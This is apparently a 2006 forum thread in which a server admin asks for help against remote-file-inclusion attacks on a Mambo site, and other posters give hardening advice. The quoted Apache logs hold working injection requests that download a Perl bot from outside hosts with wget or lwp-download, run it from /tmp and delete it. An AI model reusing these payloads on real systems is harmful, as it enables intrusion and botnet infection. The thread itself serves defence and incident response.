server being attacked by script injections I have already chmod wget but attacks still continue and seem to be getting more advanced need help securing the server extract from logfile /var/log/apache2/access_log 82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0" extract from logfile /var/log/apache2/error_log [Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP [Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP --22:20:55-- http://66.90.88.178/mambo.txt => `mambo.txt' Connecting to 66.90.88.178:80... connected. HTTP request sent, awaiting response... 200 OK Length: 16,282 (16K) [text/plain] 0K .......... ..... 100% 7.77 KB/s 22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282] kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec] [Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM [Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM Need help advice anything... Thank you in advance
Remove the script asap. Contact author of script and tell them about this if you haven't wrote it yourself. You might also check for updates.. Denying IP won't solve it cause he can use different server and voila, you get hacked again.. I would lock down the server untill its checked out.. Run chrootkit and rkhunter (not sure if they detect this script but it can't hurt running them..).. An antivirus scan can't hurt either.. Btw, mambo is VERY buggy application. Would suggest you to switch to joomla if you want the same interface and stuff.. I think you can even upgrade from mambo to joomla..
Cant find the scripts on my site I cant seem to find the script on my server I've installed rkhunter and updated + scanned the system. found nothing 66.90.88.178 is not my site its just that my server is being told the get these scripts from various sites including the one mentioned and then running them when i check my running proccesses I find alot of https instances which dont make any sense to me I've tried looking for help on installing modsecurity on my suse 10 server, but had no luck. not to sure if its safe to install when running ispconfig with suse 10 using the perfect setup from howtoforge. I have also updated o the latest patches from suse. these scripts are alos being run on domains that I have since made dormant with nothing in the actual /var/www/web#/web folder when i check my logs even they are being used to download these scripts which is strange since before ispconfig was installed I chmod 700 wget.
The script looks like a war bot or how they are called.. They are using known exploid of script (you running Mambo script right?), they google it and then try to inject this script. Check by running processes (ps) and network connections (netstat) if you are connected to IRC host: 66.90.88.178 port: 7474 If you are, kill it! and block that port and IP with firewall.. Once you fix this, got to that IRC channel and say to them: I just PWNED YOU!
output of netstat Active UNIX domain sockets (w/o servers) Proto RefCnt Flags Type State I-Node Path unix 14 [ ] DGRAM 9984 /dev/log unix 2 [ ] DGRAM 9986 /var/lib/named/dev/log unix 2 [ ] DGRAM 4385 @/org/kernel/udev/udevd unix 2 [ ] DGRAM 12216 @/var/run/hal/hotplug_s ocket2 unix 2 [ ] DGRAM 28905 unix 2 [ ] DGRAM 17548 unix 2 [ ] DGRAM 16934 unix 3 [ ] STREAM CONNECTED 16687 unix 3 [ ] STREAM CONNECTED 16686 unix 3 [ ] STREAM CONNECTED 16683 unix 3 [ ] STREAM CONNECTED 16682 unix 3 [ ] STREAM CONNECTED 16679 unix 3 [ ] STREAM CONNECTED 16678 unix 3 [ ] STREAM CONNECTED 16675 unix 3 [ ] STREAM CONNECTED 16674 unix 3 [ ] STREAM CONNECTED 16671 unix 3 [ ] STREAM CONNECTED 16670 unix 3 [ ] STREAM CONNECTED 16667 unix 3 [ ] STREAM CONNECTED 16666 unix 3 [ ] STREAM CONNECTED 16663 unix 3 [ ] STREAM CONNECTED 16662 unix 3 [ ] STREAM CONNECTED 16659 unix 3 [ ] STREAM CONNECTED 16658 unix 3 [ ] STREAM CONNECTED 16655 unix 3 [ ] STREAM CONNECTED 16654 unix 3 [ ] STREAM CONNECTED 16651 unix 3 [ ] STREAM CONNECTED 16650 unix 3 [ ] STREAM CONNECTED 16647 unix 3 [ ] STREAM CONNECTED 16646 unix 3 [ ] STREAM CONNECTED 16643 unix 3 [ ] STREAM CONNECTED 16642 unix 3 [ ] STREAM CONNECTED 16639 unix 3 [ ] STREAM CONNECTED 16638 unix 3 [ ] STREAM CONNECTED 16635 unix 3 [ ] STREAM CONNECTED 16634 unix 3 [ ] STREAM CONNECTED 16631 unix 3 [ ] STREAM CONNECTED 16630 unix 3 [ ] STREAM CONNECTED 16627 unix 3 [ ] STREAM CONNECTED 16626 unix 3 [ ] STREAM CONNECTED 16623 unix 3 [ ] STREAM CONNECTED 16622 unix 3 [ ] STREAM CONNECTED 16619 unix 3 [ ] STREAM CONNECTED 16618 unix 3 [ ] STREAM CONNECTED 16615 unix 3 [ ] STREAM CONNECTED 16614 unix 3 [ ] STREAM CONNECTED 16611 unix 3 [ ] STREAM CONNECTED 16610 unix 3 [ ] STREAM CONNECTED 16607 unix 3 [ ] STREAM CONNECTED 16606 unix 3 [ ] STREAM CONNECTED 16603 unix 3 [ ] STREAM CONNECTED 16602 unix 3 [ ] STREAM CONNECTED 16599 unix 3 [ ] STREAM CONNECTED 16598 unix 3 [ ] STREAM CONNECTED 16595 unix 3 [ ] STREAM CONNECTED 16594 unix 3 [ ] STREAM CONNECTED 16591 unix 3 [ ] STREAM CONNECTED 16590 unix 3 [ ] STREAM CONNECTED 16588 unix 3 [ ] STREAM CONNECTED 16587 unix 3 [ ] STREAM CONNECTED 16584 unix 3 [ ] STREAM CONNECTED 16583 unix 3 [ ] STREAM CONNECTED 16581 unix 3 [ ] STREAM CONNECTED 16580 unix 2 [ ] DGRAM 16565 unix 2 [ ] DGRAM 13315 unix 3 [ ] STREAM CONNECTED 13230 /var/run/dbus/system_bu s_socket unix 3 [ ] STREAM CONNECTED 13229 unix 3 [ ] STREAM CONNECTED 13019 @/tmp/hald-local/dbus-q emgvsK3Jl unix 3 [ ] STREAM CONNECTED 13018 unix 3 [ ] STREAM CONNECTED 12908 /var/run/dbus/system_bu s_socket unix 3 [ ] STREAM CONNECTED 12907 unix 3 [ ] STREAM CONNECTED 12906 /var/run/acpid.socket unix 3 [ ] STREAM CONNECTED 12905 unix 2 [ ] DGRAM 12902 unix 3 [ ] STREAM CONNECTED 12505 /var/run/acpid.socket unix 3 [ ] STREAM CONNECTED 12504 unix 3 [ ] STREAM CONNECTED 12570 @/tmp/hald-local/dbus-q emgvsK3Jl unix 3 [ ] STREAM CONNECTED 12503 unix 2 [ ] DGRAM 12142 unix 2 [ ] DGRAM 10931 unix 2 [ ] DGRAM 10743 unix 2 [ ] DGRAM 10537 unix 2 [ ] DGRAM 10363 unix 2 [ ] DGRAM 9994 unix 2 [ ] STREAM CONNECTED 9811 unix 3 [ ] STREAM CONNECTED 4968 unix 3 [ ] STREAM CONNECTED 4967
netstat -tap reveals the following Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 *:mysql *:* LISTEN 3045/mysqld tcp 0 0 localhost:compaq-evm *:* LISTEN 4683/fam tcp 0 0 *:sunrpc *:* LISTEN 4306/portmap tcp 0 0 *:hosts2-ns *:* LISTEN 4093/ispconfig_http tcp 0 0 *:ftp *:* LISTEN 5350/proftpd: (acce tcp 0 0 192.168.0.200:domain *:* LISTEN 5276/named tcp 0 0 server.mydomain:domain *:* LISTEN 5276/named tcp 0 0 localhost:domain *:* LISTEN 5276/named tcp 0 0 localhost:953 *:* LISTEN 5276/named tcp 0 0 *:smtp *:* LISTEN 5138/master tcp 0 0 *op3 *:* LISTEN 4531/couriertcpd tcp 0 0 *:imap *:* LISTEN 4501/couriertcpd tcp 0 0 *:www-http *:* LISTEN 5005/httpd2-prefork tcp 0 0 *:ssh *:* LISTEN 4905/sshd tcp 0 0 localhost:953 *:* LISTEN 5276/named tcp 0 0 *:smtp *:* LISTEN 5138/master tcp 0 0 *:https *:* LISTEN 5005/httpd2-prefork
This is after I blocked what you said before on the firewall and restarted the server, I have also blocked the ip's in .htaccess
for securing you could use mod_security for apache. But be careful with that, so misconfigured mod_security causes e.g. phpMyAdmin to not work anymore, because it submits built queries via GET which is disallowed in some howtos for mod_security. Next thing you can do is to disallow stuff like url_fopen wrappers in php.ini, because normally the admin should now if scripts need to get sth. from anywhere in the internet.
On what? Installation or configuration? That's a (undocumented) config example on mod_security That can be placed anywhere in you apache config... under debian it makes sense to store that file to mods-available and link it into mods-enabled on usage. Under Suse I actually (and I don't mind ) don't know the hundreds of files the config is split into and where to best put that... Also you must load the module with sth. like Do disable that stuff for e.g. phpMyAdmin If you're not willing to apply that rules from above to _ALL_ your sites and to a whitelist like that stuff with phpMyAdmin, it makes sense to apply that filter only on some dirs.... More on Installation and configuration can be found here: http://www.modsecurity.org/documentation/modsecurity-apache/1.9.3/html-multipage/
Attacks continue I've now spent the last 48h reinstalling the entire server. I've done all the above mentioned, but when I check my logfiles I find the following in except for the mod_security bit. I've redone the websites the mambo sites are now blank joomla latest stable version sites untill I get time to redo them. The only .htaccess files I can find lie in the stats folders is this correct. /var/log/httpd/ispconfig_access_log: www.mydomain.com||||167||||82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0" and in /var/log/apache2/access_log for the same time 82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0" 61.135.145.206 - - [17/Jul/2006:21:24:12 +0200] "GET / HTTP/1.1" 200 17330 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" and in /var/log/apache2/error_log at the same time [Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP [Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP is this a failed attempt or do I have reason to worry, I'm about to go out of my mind. Please help
Attacks continue cause you are still using the same buggy script! I've told you already to remove it from public usage! That PHP error is nothing you have to be worried about. But please, disable this mambo site and the attacks will stop. Blocking 1 IP is kinda useless since they just change sites.. Again, REMOVE THE WEBSITE or update website with newer patch or something.. What version of Mambo cms are you using?
Just one thing to mention, it is a good practice to enable and configure firewall for outbound connections as well. If you had a good firewall script which allow to access http only to trusted sites, then you wouldn't have to worry about those attacks.
see: http://www.howtoforge.com/forums/showthread.php?t=4770&highlight=$go_info["server"]["apache2_php"]
and don't forget to allow only some symten users for some connections.... next thing is disable "allow url fopen" in php.ini to prevent any script reading stuff from anywhere in the internet!
